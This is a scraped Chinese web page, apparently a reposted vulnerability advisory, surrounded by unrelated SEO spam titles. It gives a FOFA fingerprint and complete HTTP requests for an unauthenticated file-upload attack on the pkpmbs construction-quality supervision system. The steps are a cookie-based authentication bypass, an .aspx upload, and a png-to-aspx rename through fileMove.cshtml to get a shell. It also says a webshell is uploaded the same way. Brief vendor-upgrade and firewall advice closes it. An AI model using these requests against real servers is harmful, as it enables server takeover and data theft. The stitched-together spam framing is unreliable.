当前位置: 首页 > news >正文

wordpress版 影视站这是为了使网页

wordpress版 影视站,这是为了使网页,花店网站首页模版,福州建设高端网站0x01 产品简介 pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的#xff0c;B/S架构的检测信息监管系统。 0x02 漏洞概述 pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文…0x01 产品简介 pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的B/S架构的检测信息监管系统。 0x02 漏洞概述 pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文件上传漏洞未经身份认证的攻击者可以利用漏洞上传恶意后门文件从而获取服务器权限。 0x03 影响范围 标准版 2.2023.0328.172228 0x04 复现环境 FOFAicon_hash2001627082 0x05 漏洞复现  PoC-1 GET /Login.cshtml HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 获取有效cookie绕过权限认证 携带cookie上传文件  POST /Applications/Forms/SearchSetting/FileUpOrDown.ashx?operationFileuploadextName.aspxsearchConfigName上传的文件名 HTTP/1.1 Host: your-ip Cookie: your-cookie Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9 Content-Type: multipart/form-data; boundary----WebKitFormBoundarybqACRhAMBHmQQAUP Content-Length: 185------WebKitFormBoundarybqACRhAMBHmQQAUP Content-Disposition: form-data; nameFiledata; filename1.aspx Content-Type: image/pngtest ------WebKitFormBoundarybqACRhAMBHmQQAUP-- 回显了上传路径验证 Getshell PoC-2  POST /Platform/System/FileUpload.ashx HTTP/1.1 Host: your-ip Content-Type: multipart/form-data; boundary----WebKitFormBoundarybqACRhAMBHmQQAUP Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15------WebKitFormBoundarybqACRhAMBHmQQAUP Content-Disposition: form-data; namefile; filename1.aspx Content-Type: image/pngtest ------WebKitFormBoundarybqACRhAMBHmQQAUP Content-Disposition: form-data; nametarget/Applications/SkillDevelopAndEHS/ ------WebKitFormBoundarybqACRhAMBHmQQAUP-- PS直接是不允许上传aspx文件需要先上传txt、png等类型文件然后转换文件格式  上传png文件 转换文件类型 GET /Applications/SkillDevelopAndEHS/fileMove.cshtml?filePath上传的文件名factFilePath1.aspx HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 根据上面回显的路径验证 上传马子也是同样的姿势 0x06 修复建议 官方已修复该漏洞请用户联系厂商升级至安全版本http://www.hunanjianyan.com/ 通过防火墙等安全设备设置访问策略设置白名单访问。 如非必要禁止公网访问该系统。
http://www.zqtcl.cn/news/470068/

相关文章:

  • 中山精品网站建设市场wordpress登陆phpadmin
  • 泸县手机网站建设佛山城市建设工程有限公司
  • 长沙网站推广排名优化wordpress主题字体更改
  • 深圳网站建设软件定制公司房地产开发公司注册资金要求
  • 个人如何在企业网站做实名认证房地产平面设计主要做什么
  • 网站做字工具WordPress搜索功能增强
  • 慢慢来做网站多少钱wordpress优化搜索引擎
  • 网页 网站 区别现在装宽带要多少钱
  • 黄金网站下载免费建设个人网站需要什么条件
  • 网站开发人员岗位职责网站维护报价单
  • 免费正能量不良网站推荐自建网站视频教程
  • 厦门物流网站建设南京宜电的网站谁做的
  • vps 网站备案手机界面设计素材
  • seo排名影响因素主要有灯塔seo
  • 济南哪家做网站小勇cms网站管理系统
  • sns社交网站注册做网站 提交源码 论坛
  • wordpress网站编辑semir是什么牌子
  • 做区块链的网站教育培训机构平台
  • 系统网站怎么做的seo竞争对手分析
  • 菏泽网站建设菏泽众皓网页开发工资
  • 网站建设需求分析酒类群晖wordpress 映射
  • 呼和浩特网站建设宣传wordpress淘宝客插件开发
  • 如何建网站赚钱做淘宝网店需要多少钱
  • 做个企业网站 优帮云移动商城个人中心手机卡进度查询
  • 深圳建设网站哪家最好国外互联网裁员
  • 网站重新建设的请示wordpress get_terms 排序
  • 建站模板免费下载wordpress 管理地址
  • 静安企业网站制作wordpress文章列表显示缩略图
  • html前端网站开发先做网站还是先解析
  • 怎么通过域名访问网站elision wordpress